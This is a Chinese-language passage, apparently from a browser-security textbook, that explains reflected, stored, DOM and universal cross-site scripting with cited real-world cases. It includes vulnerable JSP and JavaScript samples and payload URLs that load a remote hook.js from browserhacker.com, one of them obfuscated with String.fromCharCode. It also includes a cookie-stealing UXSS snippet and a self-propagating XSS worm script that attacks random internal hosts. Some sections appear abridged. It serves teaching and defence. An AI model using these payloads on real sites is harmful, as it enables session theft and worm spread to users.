恶意行为最早的形式包括: 2 Carnegie Mellon University. (2000). CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests . Retrieved February 23, 2013 from http://www.cert.org/advisories/CA-2000-02.html cookie篡改 (cookie poisoning) 暴露敏感信息 违背基于来源的安全规则 篡改Web表单 暴露SSL加密的内容 最初的报告把这种攻击描述为通过情况下的“跨站点”脚本执行,最终则被称为Cross-site Scripting,简写成CSS。
3 Jeremiah Grossman. (2006). The origins of Cross-Site Scripting (XSS) . Retrieved February 23, 2013 from http://jeremiahgrossman.blogspot.com.au/2006/07/origins-of-cross-site-scripting-xss.html 一般来说,在不可信的内容被处理,然后又被当成可信任内容在浏览器中渲染后,XSS就出现了。
4 Jon Oberheide. (2011). How I Almost Won Pwn2Own via XSS . Retrieved March 3, 2013 from http://jon.oberheide.org/blog/2011/03/07/how-i-almost-won-pwn2own-via-xss/ XSS分很多种类,但宽泛地说,它们可能会影响浏览器和服务器中的任何一个。
很早就有的 反射型XSS (Reflected XSS)和 持久型XSS (Persistent XSS)是利用服务器端隐患的,而DOM XSS和 通用XSS (Universal XSS,也叫UXSS)利用的则是客户端的缺陷。
1. 反射型XSS 反射型XSS是最常见的XSS,其过程是不可信用户数据被提交到一个Web应用,然后该数据立即在响应中被返回,也就是说在页面中反射回了不可信内容。
下面是一个存在隐患的JSP代码的例子: <% String userId = request.getParameter("user"); %> Your User ID is <%= userId %> 这行代码接收用户查询参数并将参数内容直接在响应中返回。
利用这种隐患很简单,只要在浏览器地址栏内输入以下地址:http://browservictim.com/userhome.jsp?user=<iframe%20src=http://browserhacker.com/></iframe>。
同样,要向浏览器中注入远程JavaScript脚本,只需欺骗目标访问以下地址:http://browservictim.com/userhome.jsp?user=<script%20src=http://browserhacker.com/hook.js></script>。
Web应用在处理这个URL时,就会在HTML中返回相应的<script>块。 浏览器在接收到响应后,看到其中包含指向远程JavaScript的<script>块,就会在被攻击来源的上下文中执行该脚本。
模糊URL 模糊URL的方法如下: 缩短URL 重定向URL 采用URL编码或ASCII编码来编码URL 添加一些多余的、无关的查询参数,把恶意内容放在中间或后面 在URL中使用@符号以添加伪域名内容 把主机名转换为整数,比如http://3409677458 现实中的反射型XSS 现实当中的反射型XSS利用案例实在太多了,我们在这里挂一漏万地只列出几个比较突出的例子。
Ramneek Sidhu的“Reflected XSS vulnerability affects millions of sites hosted in HostMonster”( http://www.ehackingnews.com/2013/01/reflected-xss-hostmonster.html ) HostMonster的主机服务对所有托管的网站都默认提供了一个HTTP 404错误页面。
XSSed的“F-Secure, McAfee and Symantec websites again XSSed”( http://www.xssed.com/news/130/F-Secure_McAfee_and_Symantec_websites_again_XSSed/ ) XSSed是一个报告XSS缺陷的流行网站,发表过一篇汇总主流安全厂商发现的反射型XSS隐患的文章。
Michael Sutton的“Mobile App Wall of Shame: ESPN ScoreCenter”( http://research.zscaler.com/2013/01/mobile-app-wall-of-shameespn.html ) XSS缺陷不一定只存在于标准的浏览器。 ZScaler研究人员Michael Sutton发现了一个移动网站的XSS缺陷,而这个移动网站主要是通过iPhone应用中WebView控制器来渲染的。
对攻击者来说,这种XSS是比较有吸引力的,因为不必每次都煞费苦心地设计链接或者采用社会工程手段,相对一劳永逸了,结果则是比较容易被滥用。
比如: <% String userDisplayName = request.getParameter("userdisplayname"); String userSession = session.getAttribute('userid'); String dbQuery = "INSERT INTO users (userDisplayName) VALUES(?) WHERE userId = ?"; PreparedStatement statement = connection.prepareStatement(dbQuery); statement.setString(1, userDisplayName); statement.setString(2, userSession); statement.executeUpdate(); %> 假设在应用中的某个地方,有代码会提取最后登录用户的列表: <% Statement statement = connection.createStatement(); ResultSet result = statement.executeQuery("SELECT * FROM users LIMIT 10"); %> The top 10 latest users to sign up:<br /> <% while(result.next()) { %> User: <%=result.getString("userDisplayName")%><br /> <% } %> 那么利用这个漏洞(比如访问这个链接:http://browservictim.com/newuser.jsp?userdisplayname=<script%20src=http://browserhacker.com/hook.js></script>),就能让作为攻击者的你威力倍增。
Ben Hayak的“Google Mail Hacking - Gmail Stored XSS - 2012! ”( http://www.benhayak.blogspot.co.uk/2012/06/google-mail-hacking-gmail-stored-xss.html ) Hayak发现了Gmail存在的持久型XSS缺陷。
3. DOM XSS DOM XSS是一种纯粹的客户端XSS类型,不依赖Web应用处理用户输入时的漏洞。 与反射型和存储型XSS相比,DOM XSS的不同之处在于只利用客户端代码(比如JavaScript)中存在的缺陷。
这段代码会根据URL中的内容动态修改页面,使用的代码如下: document.write(document.location.href.substr( document.location.href.search( /#welcomemessage/i)+16,document.location.href.length)) 这段代码会收集URL的 #welcomemessage=x 参数之后的文本,其中 x 可能包含任意字符,最终要写到当前网页的文档中。 比如,使用下面的URL,http://browservictim.com/homepage.html#welcomemessage=Hiya,在JavaScript执行之后,就会在页面主体中插入文本 'Hiya' 。 那么包含恶意代码的URL就可以是http://browservictim.com/homepage.html#welcomemessage=<script>document.location='http://browserhacker.com'</script>。 这样就会把JavaScript脚本插入DOM,导致浏览器重定向到http://browserhacker.com。
另一种可能被利用的隐患的代码如下所示: function getId(id){ console.log('id: ' + id); } var url = window.location.href; var pos = url.indexOf("id=")+3; var len = url.length; var id = url.substring(pos,len); eval('getId(' + id.toString() + ')'); 把恶意代码注入 id 参数,就可以利用以上代码。 在这个例子中,假设你想注入一个加载和执行远程JavaScript文件的指令,就可以使用下面这个DOM XSS攻击: http://browservictim.com/page.html?id=1');s=document.createElement('script');s. src='http://browserhacker.com/hook.js';document.getElementsByTagName('head')[0].appendChild(s);// 有读者可能已经猜到了,上面这行代码不会真正执行,因为其中的单引号字符会导致调用 eval() 时出错。
为此,可以使用JavaScript的 String.fromCharCode() 方法封装这行代码,得到的URL类似如下所示: http://browservictim.com/page.html?id=1');eval(String.fromCharCode(115, 61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,10 9,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61 ,39,104,116,116,112,58,47,47,98,114,111,119,115,101,114,104,97,99,107,10 1,114,46,99,111,109,47,104,111,111,107,46,106,115,39,59,100,111,99,117,1 09,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,9 7,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,10 1,110,100,67,104,105,108,100,40,115,41,59))// 这个例子展示了利用这种XSS时的一个有意思的问题。
Stefano Di Paola的“DOM XSS on Google Plus One Button”( http://blog.mindedsecurity.com/2012/11/dom-xss-on-google-plus-one-button.html ) Stefano Di Paola发现了谷歌+1按钮JavaScript中的一个CORS的缺陷。
Shahin Ramezany的“Yahoo Mail DOM-XSS”( http://abysssec.com/files/Yahoo!_DOM-SDAY.pdf ) 雅虎一个不幸的用于广告的子域使用了过时的JavaScript,其中暴露出了一个DOM XSS缺陷。
var sneaky = 'setTimeout("alert(document.cookie);", 4000); document.location.assign("http://www.gmail.com");'; document.location = 'chromehtml:"80%20javascript:document.write(sneaky)"'; 在合适的条件下,攻击者就可以在几乎任何源的名义下对目标发动攻击 5 。
5 Roi Saltzman. (2009). Google Chrome Universal XSS Vulnerability . Retrieved March 4, 2013 from http://blog.watchfire.com/wfblog/2009/04/googlechrome-universal-xss-vulnerability-.html 实际应用中,这种攻击一般会更进一步,除了利用浏览器本身的缺陷,还可能利用其扩展和插件的缺陷。
6 Wade Alcorn. (2005). The Cross-site Scripting Virus . Retrieved February 23, 2013 from http://www.bindshell.net/papers/xssv.html 这份研究讨论了一种情况,即存储型XSS一旦奏效,有可能导致(受影响源的)后续访问者也会执行恶意JavaScript。
相应XSS的攻击代码如下: <iframe name="iframex" id="iframex" src="hidden" style="display:none"> </iframe> <script SRC="http://browserhacker.com/xssv.js"></script> xssv.js文件的内容如下: function loadIframe(iframeName, url) { if ( window.frames[iframeName] ) { window.frames[iframeName].location = url; return false; } else return true; } function do_request() { var ip = get_random_ip(); var exploit_string = '<iframe name="iframe2" id="iframe2" ' + 'src="hidden" style="display:none"></iframe> ' + '<script src="http://browserhacker.com/xssv.js"></script>'; loadIframe('iframe2', "http://" + ip + "/index.php?param=" + exploit_string); } function get_random() { var ranNum= Math.round(Math.random()*255); return ranNum; } function get_random_ip() { return "10.0.0."+get_random(); } setInterval("do_request()", 10000); 可以看到,这里的JavaScript会定时执行 do_request() ,这个方法基于 loadIframe() 方法随机向不同的主机发动XSS攻击, get_random_ip() 和 get_random() 函数用于产生随机IP。